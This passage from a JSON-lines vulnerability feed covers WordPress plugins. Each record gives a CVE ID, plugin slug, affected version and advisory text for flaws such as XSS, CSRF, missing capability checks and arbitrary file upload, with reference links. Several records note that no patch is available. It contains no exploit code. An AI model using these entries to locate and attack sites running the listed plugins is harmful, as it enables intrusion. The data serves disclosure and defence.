replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccc75dee-1cf8-4fda-b2a1-f5d68e6c7887?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccc75dee-1cf8-4fda-b2a1-f5d68e6c7887?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ajax-page-loader\\\/tags\\\/2.7.7\\\/advanced-ajax-page-loader.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ajax-page-loader\\\/tags\\\/2.7.7\\\/advanced-ajax-page-loader.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ajax-page-loader\\\/tags\\\/2.7.7\\\/advanced-ajax-page-loader.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ajax-page-loader\\\/tags\\\/2.7.7\\\/advanced-ajax-page-loader.php#L131\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9443","slug":"basticom-framework","versionImpact":"1.5.0","description":"The Basticom Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.5.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3dd3dc4b-e936-46a4-8d65-5f4bf05b2374?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3dd3dc4b-e936-46a4-8d65-5f4bf05b2374?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/basticom-framework\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/basticom-framework\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178823\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3178823\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12128","slug":"simple-e-commerce-shopping-cart","versionImpact":"3.1.2","description":"The Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018monthly_sales_current_year\u2019 parameter in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-e-commerce-shopping-cart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-e-commerce-shopping-cart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7d688af-649c-4858-9c63-b12933d78bc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7d688af-649c-4858-9c63-b12933d78bc2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1668","slug":"wpschoolpress","versionImpact":"2.2.16","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to arbitrary user deletion due to a missing capability check on the wpsp_DeleteUser() function in all versions up to, and including, 2.2.16. This makes it possible for authenticated attackers, with teacher-level access and above, to delete arbitrary user accounts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd5638b6-134d-4386-af40-6ac961a915d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd5638b6-134d-4386-af40-6ac961a915d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32166","slug":"emma-emarketing-plugin","versionImpact":"1.3.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in John Housholder Emma for WordPress allows Stored XSS. This issue affects Emma for WordPress: from n\/a through 1.3.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/emma-emarketing-plugin\\\/vulnerability\\\/wordpress-emma-for-wordpress-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/emma-emarketing-plugin\\\/vulnerability\\\/wordpress-emma-for-wordpress-plugin-1-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0249","slug":"advanced-schedule-posts","versionImpact":"2.1.8","description":"The Advanced Schedule Posts WordPress plugin through 2.1.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7ee3e73-1086-421f-b586-d415a45a6c8e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e7ee3e73-1086-421f-b586-d415a45a6c8e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6064","slug":"wp-url-shortener","versionImpact":"1.2","description":"The WP URL Shortener plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the 'url_shortener_settings' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-url-shortener\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-url-shortener\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/154b3a1a-7246-42de-a555-2c655778d59e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/154b3a1a-7246-42de-a555-2c655778d59e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8898","slug":"ecab-taxi-booking-manager","versionImpact":"1.3.0","description":"The Taxi Booking Manager for Woocommerce | E-cab plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.3.0. This is due to the plugin not properly validating a user's capabilities prior to updating a plugin setting or their identity prior to updating their details like email address. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3343878\\\/ecab-taxi-booking-manager\\\/trunk\\\/inc\\\/MPTBM_Rest_Api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3343878\\\/ecab-taxi-booking-manager\\\/trunk\\\/inc\\\/MPTBM_Rest_Api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ecab-taxi-booking-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ecab-taxi-booking-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd50ac2c-3049-4a44-b7f8-a5f87c42555c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd50ac2c-3049-4a44-b7f8-a5f87c42555c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0555","slug":"quick-restaurant-menu","versionImpact":"2.0.2","description":"The Quick Restaurant Menu plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.0.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke those actions intended for administrator use. Actions include menu item creation, update and deletion and other menu management functions. Since the plugin does not verify that a post ID passed to one of its AJAX actions belongs to a menu item, this can lead to arbitrary post deletion\/alteration.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97984c7d-d6ff-480c-acfe-20ab0eb04141\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97984c7d-d6ff-480c-acfe-20ab0eb04141\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4330","slug":"envato-elements","versionImpact":"2.0.10","description":"The Envato Elements & Download and Template Kit \u2013 Import plugins for WordPress are vulnerable to arbitrary file uploads due to insufficient validation of file type upon extracting uploaded Zip files in the installFreeTemplateKit and uploadTemplateKitZipFile functions. This makes it possible for attackers with contributor-level permissions and above to upload arbitrary files and potentially gain remote code execution in versions up to and including 1.0.13 of Template Kit \u2013 Import and versions up to and including 2.0.10 of Envato Elements & Download.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2617529%40envato-elements&new=2617529%40envato-elements&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2617529%40envato-elements&new=2617529%40envato-elements&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fe17e2-d5ab-4ebd-a5c6-d65cea327abd\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fe17e2-d5ab-4ebd-a5c6-d65cea327abd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1160","slug":"bold-page-builder","versionImpact":"4.8.0","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon Link in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/818d3418-8e14-49b9-a112-8eab9eb3c283?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/818d3418-8e14-49b9-a112-8eab9eb3c283?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6309","slug":"attachment-file-icons","versionImpact":"1.3","description":"The Attachment File Icons (AF Icons) plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 1.3. This is due to missing nonce validation in the 'afi_overview' function and missing file type validation in the 'upload_icons' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e3fd472-c8ea-42dc-93df-872361ec97f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e3fd472-c8ea-42dc-93df-872361ec97f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attachment-file-icons\\\/tags\\\/1.3\\\/attachment-file-icons.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attachment-file-icons\\\/tags\\\/1.3\\\/attachment-file-icons.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attachment-file-icons\\\/tags\\\/1.3\\\/attachment-file-icons.php#L337\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attachment-file-icons\\\/tags\\\/1.3\\\/attachment-file-icons.php#L337\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9177","slug":"themedy-toolbox","versionImpact":"1.0.14","description":"The Themedy Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's themedy_col, themedy_social_link, themedy_alertbox, and themedy_pullleft shortcodes in all versions up to, and including, 1.0.14, and up to, and including 1.0.15 for the plugin's themedy_button shortcode due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/755e0998-0f0d-4259-881d-ed07aecb0b10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/755e0998-0f0d-4259-881d-ed07aecb0b10?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themedy-toolbox\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themedy-toolbox\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157836\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157836\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10711","slug":"ithemelandco-woo-report","versionImpact":"1.5.1","description":"The WooCommerce Report plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.1. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update arbitrary options that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1d21339-3a86-4bee-be86-2d2ab9190b26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1d21339-3a86-4bee-be86-2d2ab9190b26?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ithemelandco-woo-report\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ithemelandco-woo-report\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ithemelandco.com\\\/docs\\\/woocommerce-report\\\/\",\"name\":\"https:\\\/\\\/ithemelandco.com\\\/docs\\\/woocommerce-report\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ithemelandco-woo-report\\\/trunk\\\/class\\\/setting_report.php#L1174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ithemelandco-woo-report\\\/trunk\\\/class\\\/setting_report.php#L1174\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181117\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181117\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11374","slug":"twchat","versionImpact":"4.0.4","description":"The TWChat \u2013 Send or receive messages from users plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.0.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twchat\\\/tags\\\/4.0.3\\\/classes\\\/Addon_controller.class.php#L198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twchat\\\/tags\\\/4.0.3\\\/classes\\\/Addon_controller.class.php#L198\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb047d0-0056-432c-bae3-3ab926e39bcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb047d0-0056-432c-bae3-3ab926e39bcd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11893","slug":"spoki","versionImpact":"2.15.14","description":"The Spoki \u2013 Chat Buttons and WooCommerce Notifications plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spoki_button' shortcode in all versions up to, and including, 2.15.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spoki\\\/trunk\\\/spoki.php#L1256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spoki\\\/trunk\\\/spoki.php#L1256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spoki\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spoki\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba965a6a-68ed-4383-93a7-593418df34a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba965a6a-68ed-4383-93a7-593418df34a5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1667","slug":"wpschoolpress","versionImpact":"2.2.16","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the wpsp_UpdateTeacher() function in all versions up to, and including, 2.2.16. This makes it possible for authenticated attackers, with teacher-level access and above, to update arbitrary user details including email which makes it possible to request a password reset and access arbitrary user accounts, including administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks-teacher.php#L544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks-teacher.php#L544\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54f98bc-c538-4f3c-b24a-6e778a3748ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54f98bc-c538-4f3c-b24a-6e778a3748ef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7297","slug":"twitter-posts","versionImpact":"1.0.2","description":"The TwitterPosts WordPress plugin through 1.0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3632dfa1-2948-4622-a8fd-31edb8b22383\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3632dfa1-2948-4622-a8fd-31edb8b22383\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6063","slug":"xisearch-bar","versionImpact":"2.6","description":"The XiSearch bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6. This is due to missing or incorrect nonce validation on the 'xisearch-key-config' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xisearch-bar\\\/trunk\\\/xisearch.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xisearch-bar\\\/trunk\\\/xisearch.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd828557-94f6-4278-98ef-bcf4d1d86440?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd828557-94f6-4278-98ef-bcf4d1d86440?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5811","slug":"listly","versionImpact":"2.7","description":"The Listly: Listicles For WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Init() function in all versions up to, and including, 2.7. This makes it possible for unauthenticated attackers to delete arbitrary transient values on the WordPress site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listly\\\/trunk\\\/listly.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listly\\\/trunk\\\/listly.php#L151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/listly\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/listly\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee6749f5-1dd0-4687-9a86-64fd1161321b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee6749f5-1dd0-4687-9a86-64fd1161321b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0554","slug":"quick-restaurant-menu","versionImpact":"2.0.2","description":"The Quick Restaurant Menu plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on its AJAX actions. This makes it possible for unauthenticated attackers to update menu items, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfc7c214-8d76-453c-a05d-682aa425b06e\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfc7c214-8d76-453c-a05d-682aa425b06e\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36697","slug":"wp-gdpr-core","versionImpact":"2.1.1","description":"The WP GDPR plugin for WordPress is vulnerable to authorization bypass due to a missing capability check in versions up to, and including, 2.1.1. This makes it possible for unauthenticated attackers to delete any comment and modify the plugin\u2019s settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/032e775a-97be-4d93-bac3-094e35be4b11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/032e775a-97be-4d93-bac3-094e35be4b11?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-and-content-spoofing-vulnerabilities-in-wordpress-wp-gdpr-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-and-content-spoofing-vulnerabilities-in-wordpress-wp-gdpr-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-wp-gdpr-multiple-vulnerabilities-2-1-1\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-wp-gdpr-multiple-vulnerabilities-2-1-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4636","slug":"user-private-files","versionImpact":"2.0.3","description":"The WordPress File Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been 